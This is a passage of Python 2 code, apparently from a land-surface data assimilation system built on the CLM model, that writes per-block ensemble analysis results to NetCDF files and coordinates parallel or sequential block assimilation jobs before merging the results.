#NC_File_Out_Block_Assim.createVariable('CLM_Snow_Depth_Ensemble_Mat','f4',('lat','lon','Ensemble_Number',),zlib=True)
#NC_File_Out_Block_Assim.createVariable('CLM_Snow_Water_Ensemble_Mat','f4',('lat','lon','Ensemble_Number',),zlib=True)
#NC_File_Out_Block_Assim.createVariable('CLM_ROOTFR_Ensemble_Mat','f4',('Soil_Layer_Num','lat','lon','Ensemble_Number',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Prop_Grid_Array_Sys_parm_infl','f4',('Dim_CLM_State','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Soil_Moisture_parm_infl','f4',('Soil_Layer_Num','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Soil_Temperature_parm_infl','f4',('Soil_Layer_Num','lat','lon',),zlib=True)
#NC_File_Out_Block_Assim.createVariable('CLM_Soil_Ice_parm_infl','f4',('Soil_Layer_Num','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Vegetation_Temperature_parm_infl','f4',('lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Ground_Temperature_parm_infl','f4',('lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Surface_Temperature_parm_infl','f4',('lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Observation','f4',('Dim_CLM_State','lat','lon',),zlib=True)
if Def_Print:
print "Row_Numbers_SubBlock_Patch,Col_Numbers_SubBlock_Patch",Row_Numbers_SubBlock_Patch,Col_Numbers_SubBlock_Patch
if Def_Print:
print 'Write NetCDF File:',NC_FileName_Out_Block_Assim
if Parameter_Optimization_Flag:
if Soil_Par_Sens_Dim >= 1:
NC_File_Out_Block_Assim.variables['Parameter_Soil_Space_Ensemble'][:, :, :, :] = Parameter_Soil_Space_Ensemble_SubBlock[:, :, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Parameter_Soil_Space_parm_infl'][:, :, :] = Parameter_Soil_Space_parm_infl_SubBlock[:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
if PFT_Par_Sens_Dim >= 1:
NC_File_Out_Block_Assim.variables['Parameter_PFT_Space_Ensemble'][:, :, :, :] = Parameter_PFT_Space_Ensemble_SubBlock[:, :, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Parameter_PFT_Space_parm_infl'][:, :, :] = Parameter_PFT_Space_parm_infl_SubBlock[:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Prop_Grid_Array_Sys'][:, Prop_Grid_Array_Sys_Index, :, :] = Prop_Grid_Array_SubBlock[:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Prop_Grid_Array_H_Trans'][:, Prop_Grid_Array_Sys_Index, :, :] = Prop_Grid_Array_H_Trans_SubBlock[:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Innovation_State'][:,Prop_Grid_Array_Sys_Index,:,:] = Innovation_State_SubBlock[:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Increments_State'][:,Prop_Grid_Array_Sys_Index,:,:] = Increments_State_SubBlock[:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Analysis_Grid'][:, :] = Analysis_Grid_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Localization_Map_Mask'][:, :] = Localization_Map_Mask_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Analysis_Grid_Array'][:, Prop_Grid_Array_Sys_Index, :, :] = Analysis_Grid_Array_SubBlock[:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['CLM_Soil_Moisture_Ensemble_Mat'][:, :, :, :] = CLM_Soil_Moisture_Ensemble_Mat_SubBlock[:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
NC_File_Out_Block_Assim.variables['CLM_Soil_Temperature_Ensemble_Mat'][:, :, :, :] = CLM_Soil_Temperature_Ensemble_Mat_SubBlock[:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
NC_File_Out_Block_Assim.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][:, :, :] = CLM_Vegetation_Temperature_Ensemble_Mat_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
NC_File_Out_Block_Assim.variables['CLM_Ground_Temperature_Ensemble_Mat'][:, :, :] = CLM_Ground_Temperature_Ensemble_Mat_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
NC_File_Out_Block_Assim.variables['Prop_Grid_Array_Sys_parm_infl'][Prop_Grid_Array_Sys_Index,:, :] = Prop_Grid_Array_Sys_parm_infl_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['CLM_Soil_Moisture_parm_infl'][:, :, :] = CLM_Soil_Moisture_parm_infl_SubBlock[:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['CLM_Soil_Temperature_parm_infl'][:, :, :] = CLM_Soil_Temperature_parm_infl_SubBlock[:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['CLM_Vegetation_Temperature_parm_infl'][:, :] = CLM_Vegetation_Temperature_parm_infl_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['CLM_Ground_Temperature_parm_infl'][:, :] = CLM_Ground_Temperature_parm_infl_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['CLM_Surface_Temperature_parm_infl'][:, :] = CLM_Surface_Temperature_parm_infl_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Observation'][Prop_Grid_Array_Sys_Index,:,:] = Observation_Matrix_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.sync()
NC_File_Out_Block_Assim.close()
del Observation_Variance_SubBlock,Observation_Longitude_SubBlock,Observation_Latitude_SubBlock,Observation_Matrix_SubBlock
del E0_SysModel_SubBlock,E0_ObsModel_SubBlock, parm_infl
del Parameter_Soil_Space_Ensemble_SubBlock, Parameter_Soil_Space_parm_infl_SubBlock, Parameter_Hard_Space_Ensemble_SubBlock, Parameter_Hard_Space_parm_infl_SubBlock, Parameter_Veg_Space_Ensemble_SubBlock
del Parameter_Veg_Space_parm_infl_SubBlock, Parameter_PFT_Space_Ensemble_SubBlock, Parameter_PFT_Space_parm_infl_SubBlock
del Prop_Grid_Array_SubBlock, Prop_Grid_Array_H_Trans_SubBlock, Model_State_SubBlock, Model_Variance_SubBlock, Mask_SubBlock, Mask_Index_SubBlock, Land_Mask_Data_SubBlock
del Teta_Residual_SubBlock, Teta_Saturated_SubBlock, Teta_Field_Capacity_SubBlock, Teta_Wilting_Point_SubBlock, Analysis_Grid_SubBlock, Localization_Map_Mask_SubBlock, Analysis_Grid_Array_SubBlock
del Innovation_State_SubBlock, Increments_State_SubBlock, Soil_Layer_Thickness_Ratio
del CLM_Soil_Moisture_Ensemble_Mat_SubBlock, CLM_Soil_Temperature_Ensemble_Mat_SubBlock, CLM_Vegetation_Temperature_Ensemble_Mat_SubBlock
del CLM_Ground_Temperature_Ensemble_Mat_SubBlock, CLM_Soil_Moisture_parm_infl_SubBlock, CLM_Soil_Temperature_parm_infl_SubBlock
del Prop_Grid_Array_Sys_parm_infl_SubBlock, CLM_Vegetation_Temperature_parm_infl_SubBlock, CLM_Ground_Temperature_parm_infl_SubBlock, CLM_Surface_Temperature_parm_infl_SubBlock, CLM_Latent_Heat_parm_infl_SubBlock
del Prop_Grid_Array_Sys_parm_infl, CLM_Soil_Moisture_parm_infl, CLM_Soil_Temperature_parm_infl, CLM_Surface_Temperature_parm_infl, CLM_Ground_Temperature_parm_infl, CLM_Vegetation_Temperature_parm_infl,CLM_Latent_Heat_parm_infl, CLM_Sensible_Heat_parm_infl
del CLM_Soil_Moisture_Ensemble, CLM_Soil_Temperature_Ensemble, CLM_Surface_Temperature_Ensemble, CLM_Ground_Temperature_Ensemble, CLM_Vegetation_Temperature_Ensemble
del Mask_Sub, Mask_Index_Sub, Mask_Index_Sub_NC, Model_Variance, Observation_Variance, Observation_Longitude, Observation_Latitude, Observation_Matrix,
del numexpr_a,numexpr_b,numexpr_c
CLM_Soil_Moisture_Col = []
del CLM_Soil_Moisture_Ensemble_Mat_Bias_SubBlock, CLM_Soil_Temperature_Ensemble_Mat_Bias_SubBlock, CLM_Vegetation_Temperature_Ensemble_Mat_Bias_SubBlock
del CLM_Ground_Temperature_Ensemble_Mat_Bias_SubBlock, CLM_Soil_Moisture_parm_infl_Bias_SubBlock, CLM_Soil_Temperature_parm_infl_Bias_SubBlock
del CLM_Vegetation_Temperature_parm_infl_Bias_SubBlock, CLM_Ground_Temperature_parm_infl_Bias_SubBlock, CLM_Surface_Temperature_parm_infl_Bias_SubBlock
del CLM_Soil_Moisture_parm_infl_Bias, CLM_Soil_Temperature_parm_infl_Bias, CLM_Surface_Temperature_parm_infl_Bias, CLM_Ground_Temperature_parm_infl_Bias, CLM_Vegetation_Temperature_parm_infl_Bias,
del CLM_Soil_Moisture_Ensemble_Bias, CLM_Soil_Temperature_Ensemble_Bias, CLM_Surface_Temperature_Ensemble_Bias, CLM_Ground_Temperature_Ensemble_Bias, CLM_Vegetation_Temperature_Ensemble_Bias
del Prop_Grid_Array_Bias, Observation_Bias, Prop_Grid_Array_Bias_SubBlock, Observation_Bias_SubBlock, Prop_Grid_Array_Sys_parm_infl_Bias_SubBlock, Observation_parm_infl_Bias_SubBlock
del Prop_Grid_Array_Sys_parm_infl_Bias, Observation_parm_infl_Bias
gc.collect()
del gc.garbage[:]
return
#"******************************************************************Assimilation*******************************************************************************************"
def Assimilation_Update(mpi4py_comm, mpi4py_rank, mpi4py_name, Model_Driver, NSLOTS, finidat_initial_Array, Def_ParFor, Def_Region, Def_Initial, Irrig_Scheduling, Irrigation_Hours, Def_First_Run, Def_Print, Region_Name, Run_Dir_Home, Model_Path, CLM_Flag, Def_PP, job_server_node_array, active_nodes_server,
Start_Year, Start_Month, Start_Day, Stop_Year, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, Datetime_Start, Datetime_Start_Init, Datetime_Stop, Datetime_Stop_Init, Datetime_End, Datetime_Initial, Weather_Forecast_Days, Density_of_liquid_water, Density_of_ice, Freezing_temperature_of_fresh_water, N0, nlyr,
DAS_Data_Path, DAS_Depends_Path, DasPy_Path, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs, eps, msw_infl, Plot_Analysis, Def_Figure_Output, DateString_Plot,
Def_Write_Initial,DA_Flag, Write_DA_File_Flag, Mask, Mask_Index, COSMOS_Circle_Array, COSMOS_Circle_Index_Array, COSMOS_Circle_Num_Array, Call_Gstat_Flag, mksrf_edgee, mksrf_edges, mksrf_edgew, mksrf_edgen, Station_XY_Index, Station_XY, Observation_Box,
Variable_Assimilation_Flag, Row_Numbers, Col_Numbers, Row_Numbers_String, Col_Numbers_String, Model_Variance, Initial_Perturbation_SM_Flag, Initial_Perturbation_ST_Flag, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type, PP_Servers_Per_Node, Def_CESM_Multi_Instance, PP_Port,
Z_Resolution, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Proj_String, MODEL_CEA_X, MODEL_CEA_Y, Hydraulic_File_Name, Assim_Algorithm_Name, Low_Ratio_Par, High_Ratio_Par, Post_Inflation_Alpha_State, irrig_nsteps_per_day, PFT_Num,
Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Offset, Col_Offset, fpftcon_name, Crop_Sum,
Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD, Dim_Observation_Quantity,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array, finidat_name,
Ensemble_Number, Ensemble_Number_Predict, Soil_Layer_Num, Snow_Layer_Num, maxpft, Forcing_File_Path, dtime, Observation_Path, Dim_CLM_State, Dim_Obs_Type, CLM_NA, NAvalue, Variable_List, ntasks_CLM, rootpe_CLM, nthreads_CLM, omp_get_num_procs_ParFor,
Grid_Resolution_CEA, Grid_Resolution_GEO, SensorQuantity_Sub, SensorType_Sub, SensorVariable_Sub, SensorResolution_Sub, Variable_ID_Sub, QC_ID_Sub,Analysis_Variable_Name, Soil_Layer_Index_DA,
Observation_Matrix, Observation_Variance, Observation_Latitude, Observation_Longitude, Observation_NLons, Observation_NLats, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper, Observation_Corelation_Par,
octave,r,Def_CDF_Matching, numrad, cols1d_ixy, cols1d_jxy, pfts1d_ixy, pfts1d_jxy, cols1d_ityplun, pfts1d_ityplun, column_len, pft_len, pfts1d_itypveg, pfts1d_ci,
diskless_flag, persist_flag, Forcing_File_Path_Home, Forcing_File_Path_Array, history_file_name, Constant_File_Name, Run_Dir_Array, Feedback_Assim,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, \
Analysis_Grid, Localization_Map_Mask, ObsModel_Mat, ObsModel_Variance_Mat, Prop_Grid_Array_Sys_Index, Observation_Matrix_Index, Mask_Sub, Mask_Index_Sub,
SensorQuantity_Index, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, ParFlow_Layer_Num,
NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial, NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, \
NC_FileName_Assimilation_2_Initial_Copy, NC_FileName_Assimilation_2_Bias_Copy, NC_FileName_Assimilation_2_Bias_Monthly, NC_FileName_Assimilation_2_Bias_Monthly_Copy, NC_FileName_Assimilation_2_Parameter_Monthly, NC_FileName_Assimilation_2_Parameter_Monthly_Copy,
NC_FileName_Parameter_Space_Single, DAS_Output_Path, COSMIC_Py, window, memory_profiler, COSMIC, finidat_name_string, Observation_Time_File_Path):
##################################################################################################
if True:
Parameter_Optimization_Flag = 0
Bias_Estimation_Option_Model_Assim = numpy.asarray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) # Model Bias
Bias_Estimation_Option_Obs_Assim = numpy.asarray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) # Observation Bias
Soil_Par_Sens = []
Veg_Par_Sens = []
PFT_Par_Sens = []
Hard_Par_Sens = []
if Def_PP and (not PDAF_Assim_Framework == 2) and (Sub_Block_Ratio_Row*Sub_Block_Ratio_Col) > 1 and len(active_nodes_server) > 1:
print "********************************************** Using PP to Accelerate Block_Assim"
Job_Num_Per_Node = int(numpy.ceil(float(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col) / len(active_nodes_server)))
if Job_Num_Per_Node == 0:
Job_Num_Per_Node = 1
job_server_node_results = []
job_server_node_results_wise = [[] for i in range(len(active_nodes_server))]
print "The following submits",Job_Num_Per_Node,"jobs on each node and then retrieves the results"
Block_Index = 0
Node_Status = numpy.zeros(len(active_nodes_server),dtype=numpy.bool)
Node_Status[:] = True
while Block_Index < Sub_Block_Ratio_Row*Sub_Block_Ratio_Col:
if numpy.size(numpy.where(Node_Status==True)) > 0:
Node_Index = numpy.where(Node_Status==True)[0][0]
print "***********************Node_Index",Node_Index,"Block_Index",Block_Index,"is submitted!"
job_server_node = job_server_node_array[numpy.min([Node_Index*len(job_server_node_array)/len(active_nodes_server),len(job_server_node_array)-1])]
job_server_node_results.append(job_server_node.submit(Block_Assim, args=(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs[Prop_Grid_Array_Sys_Index], eps, msw_infl, Post_Inflation_Alpha_State, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
Observation_Corelation_Par, Bias_Estimation_Option_Model_Assim, Bias_Estimation_Option_Obs_Assim, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path),
depfuncs=(CLM_Assim_Common, Check_Outliers, ParFor_Fusion, ParFor_H_Operator, ParFor_Texture_Check, ParFor_Check_Outliers, ParFor_Check_Outliers_NA,),
modules=("numpy", "netCDF4", "sys", "os", "re", "gc", "imp", "unittest", "time", "datetime", "shutil", "fnmatch", "subprocess", "string", "socket", "signal", "gc", "imp", "getpass", "calendar", "glob","scipy.stats", 'scipy.weave'), group='Block_Assim'))
job_server_node_results_wise[Node_Index] = job_server_node_results[Block_Index]
Node_Status[Node_Index] = False
Block_Index = Block_Index + 1
if Block_Index >= len(active_nodes_server):
for job in job_server_node_results_wise:
if job != [] and job.finished:
Node_Index = job_server_node_results_wise.index(job)
print "*********************************************************************Node_Index",Node_Index,"is finished!"
Node_Status[Node_Index] = True
job_server_node_results_wise[Node_Index] = []
for job_server_node in job_server_node_array:
job_server_node.wait()
if Def_Print >= 2:
job_server_node.print_stats()
if Def_Print:
if len(job_server_node_results) > 0:
for job in job_server_node_results:
job_index = job_server_node_results.index(job)
if job_index > (Ensemble_Number - 1):
break
print "Results of ",job_index,"is", job()
else:
print "********* Run Block_Assim Sequentially"
if PDAF_Assim_Framework == 2:
DAS_Driver_Common.Stop_ppserver(mpi4py_rank, Def_PP, DAS_Depends_Path, job_server_node_array, NSLOTS, DasPy_Path, active_nodes_server, PP_Servers_Per_Node)
for Block_Index in range(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col):
Block_Assim(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs[Prop_Grid_Array_Sys_Index], eps, msw_infl, Post_Inflation_Alpha_State, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
Observation_Corelation_Par, Bias_Estimation_Option_Model_Assim, Bias_Estimation_Option_Obs_Assim, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum,
Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis,
NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path, octave, r)
print "Write NC_File_Out_Assimilation_2_Initial.nc"
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r+')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r+')
Analysis_Grid_Array = NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:, :, :, :]
Prop_Grid_Array_Sys_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_Sys_parm_infl'][:, :, :]
CLM_Soil_Moisture_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_Ensemble_Mat'][:, :, :, :]
CLM_Soil_Moisture_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_parm_infl'][:, :, :]
CLM_Soil_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_Ensemble_Mat'][:, :, :, :]
CLM_Vegetation_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][:, :, :]
CLM_Ground_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_Ensemble_Mat'][:, :, :]
CLM_Soil_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_parm_infl'][:, :, :]
CLM_Vegetation_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_parm_infl'][:, :]
CLM_Ground_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_parm_infl'][:, :]
CLM_Surface_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Surface_Temperature_parm_infl'][:, :]
Innovation_State = NC_File_Out_Assimilation_2_Diagnostic.variables['Innovation_State'][:,:, :, :]
Increments_State = NC_File_Out_Assimilation_2_Diagnostic.variables['Increments_State'][:,:, :, :]
Observation = NC_File_Out_Assimilation_2_Diagnostic.variables['Observation'][:,:, :]
for Block_Index in range(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col):
print "Block_Index",Block_Index
Sub_Block_Row_Start = Sub_Block_Row_Start_Array[Block_Index]
Sub_Block_Row_End = Sub_Block_Row_End_Array[Block_Index]
Sub_Block_Col_Start = Sub_Block_Col_Start_Array[Block_Index]
Sub_Block_Col_End = Sub_Block_Col_End_Array[Block_Index]
NC_FileName_Out_Block = DAS_Output_Path+"Analysis/"+Region_Name+"/Block_Assim_"+str(Block_Index+1)+".nc"
NC_File_Out_Block = netCDF4.Dataset(NC_FileName_Out_Block, 'r')
Analysis_Grid[Prop_Grid_Array_Sys_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Analysis_Grid'][:,:]
Localization_Map_Mask[Prop_Grid_Array_Sys_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Localization_Map_Mask'][:,:]
Analysis_Grid_Array[:, Prop_Grid_Array_Sys_Index, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Analysis_Grid_Array'][:,Prop_Grid_Array_Sys_Index,:,:]
Prop_Grid_Array_Sys_parm_infl[Prop_Grid_Array_Sys_Index, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Prop_Grid_Array_Sys_parm_infl'][Prop_Grid_Array_Sys_Index,:,:]
CLM_Soil_Moisture_Ensemble_Mat[:, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End, :] = NC_File_Out_Block.variables['CLM_Soil_Moisture_Ensemble_Mat'][:,:,:,:]
